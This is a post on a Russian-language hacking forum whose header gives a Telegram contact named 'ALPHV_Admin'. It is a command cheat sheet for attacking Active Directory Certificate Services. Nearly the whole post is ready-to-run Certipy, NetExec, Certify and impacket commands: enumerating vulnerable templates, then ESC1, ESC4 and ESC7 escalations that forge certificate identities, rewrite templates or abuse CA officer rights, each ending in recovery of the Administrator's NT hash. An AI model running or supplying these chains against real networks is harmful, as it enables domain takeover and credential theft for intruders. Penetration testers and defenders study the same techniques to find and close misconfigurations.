• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

ADCS Attacks with Certipy

admin

admin

#root
Администратор
Регистрация
20.01.2011
Сообщения
7,665
Розыгрыши
0
Реакции
135

NetExec​

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

BASH

1nxc ldap $IP -u $username -p $password -M adcs

Certipy​

Search for vulnerable certificate templates

BASH

1certipy find -u $username -p $password -dc-ip $IP -vulnerable -enabled

List CAs, servers and search for vulnerable certificate templates

BASH

1certipy find -u $username -p $password -dc-ip $IP -dns-tcp -ns $IP -debug

Certify​

Search for vulnerable certificate templates:

POWERSHELL

1Certify.exe find /vulnerable

Attacks​

ESC1​

Create a new machine account

BASH

1impacket-addcomputer $domain/$username:$password -computer-name $computer_name$ -computer-pass $computer_password

Use ability to enroll as a normal user & provide a user defined Subject Alternative Name (SAN)

BASH

1certipy req -u $computer_name$ -p $computer_password -ca $ca -target $domain -template $template -upn $username@domain -dns $domain -dc-ip $IP

Authenticate with the certificate and get the NT hash of the Administrator

BASH

1certipy auth -pfx $pfx_file -domain $domain -username $username -dc-ip $IP

ESC4​

Overwrite the configuration to make it vulnerable to ESC1

BASH

1certipy template -username $username -password $password -template $template -save-old -dc-ip $IP

Now if you run this command, it should show that the certificate is vulnerable to ESC1

BASH

1certipy find -u $username -p $password -dc-ip $IP -dns-tcp -ns $IP -stdout -debug

ESC7​

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. With the Manage CA access right, we can fulfill these prerequisites.
If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer.

BASH

1certipy ca -ca $ca -add-officer $username -username $username@domain -password $password -dc-ip $IP -dns-tcp -ns $IP

Enable the SubCA template on the CA using the -enable-template parameter. By default, the SubCA template is enabled.

BASH

1certipy ca -ca $ca -enable-template SubCA -username $username@domain -password $password -dc-ip $IP -dns-tcp -ns $IP

This request will be denied, but we will save the private key and note down the request ID.

BASH

1certipy req -username $username@domain -password $password -ca $ca -target $IP -template SubCA -upn $username@domain

With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

BASH

1certipy ca -ca $ca -issue-request $request_ID -username $username@domain -password $password

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.

BASH

1certipy req -username $username@domain -password $password -ca $ca -target $IP -retrieve $request_ID

Authenticate with the certificate and get the NT hash of the Administrator

BASH

1certipy auth -pfx $pfx -domain $domain -username $username -dc-ip $IP

Resources​

Tools​

Для просмотра ссылки Войди или Зарегистрируйся
 
Войдите или зарегистрируйтесь для ответа.
Activity
So far there's no one here
Сверху Снизу